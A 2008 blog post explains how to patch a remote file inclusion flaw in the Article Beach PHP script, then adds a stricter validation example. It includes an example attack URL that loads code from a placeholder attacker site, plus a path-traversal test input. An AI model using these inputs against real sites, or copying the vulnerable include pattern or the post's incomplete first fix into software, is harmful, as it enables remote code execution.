Article Beach Security Fix

Oct-12th-2008

Article Beach is a popular script used on article directories. Although there aren't many updates for it, and there aren't many templates or mods for it, it is still a good script to use. One problem with it, though, is a very silly security problem: anyone could easily execute PHP code from your site, so they could do anything they wanted. This is probably the major flaw in the script.

Luckily, this short post will tell you how to quickly fix this security issue.

First, open up your index.php file.

Find this code:

else
{
    include($_GET["page"].".php");
}

This is the code that is the problem. It takes a file name from a GET variable and includes it, which executes it. That means anyone could just go to http://www.yourarticledirectory.com/index.php?page=http://www.attackers-website.com/malicious-code.txt and the script would execute the code in the text file.

This is just a small fix for it. Replace that code with the following:

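else
{
    // Build the full path inside the script's own directory,
    // then include exactly the path that was checked.
    $file = dirname(__FILE__)."/".$_GET["page"].".php";
    if (file_exists($file)) {
        include $file;
    }
}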

This code first checks whether the file exists in the root directory of your article directory. This should solve the problem because obviously there won't be a file called http://www.url.com/code.txt in your root directory, so it shouldn't be able to execute.

Then just save the file, upload it, and that major security flaw should now be solved.
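The existence check above still accepts any value of page that happens to resolve to a .php file on disk. A stricter variant, as an added example that is not part of the original post or of Article Beach, validates the name and confirms the resolved file sits directly in one directory; resolve_page() and the sample inputs are hypothetical names constructed for illustration.

```php
<?php
// Added example (not Article Beach code): map a requested page name to a
// file that must live directly inside one directory, or return null.
function resolve_page($requested, $baseDir)
{
    // Accept only simple names. This rejects URLs, slashes, dots, newlines
    // and non-string input (e.g. ?page[]=x) before the disk is touched.
    if (!is_string($requested)
        || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }

    // With symlinks resolved, the file must still sit directly in $base.
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary directory holding one legitimate page.
$dir = sys_get_temp_dir() . '/pages_' . uniqid();
mkdir($dir);
file_put_contents($dir . '/about.php', '<?php echo "about";');

$samples = array(
    'about',                                               // exists
    'missing',                                             // valid name, no file
    'http://www.attackers-website.com/malicious-code.txt', // URL from the article
    '../about',                                            // leaves the directory
    array('about'),                                        // array instead of string
);

foreach ($samples as $name) {
    $path   = resolve_page($name, $dir);
    $label  = is_string($name) ? $name : '(array input)';
    $result = ($path === null) ? 'rejected' : 'include ' . basename($path);
    echo str_pad($label, 54), ' => ', $result, "\n";
}

// Remove the constructed demo files.
unlink($dir . '/about.php');
rmdir($dir);
```

In index.php the same function would be called with dirname(__FILE__) as the directory, after checking that $_GET["page"] is set, and include would run only when the result is not null.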
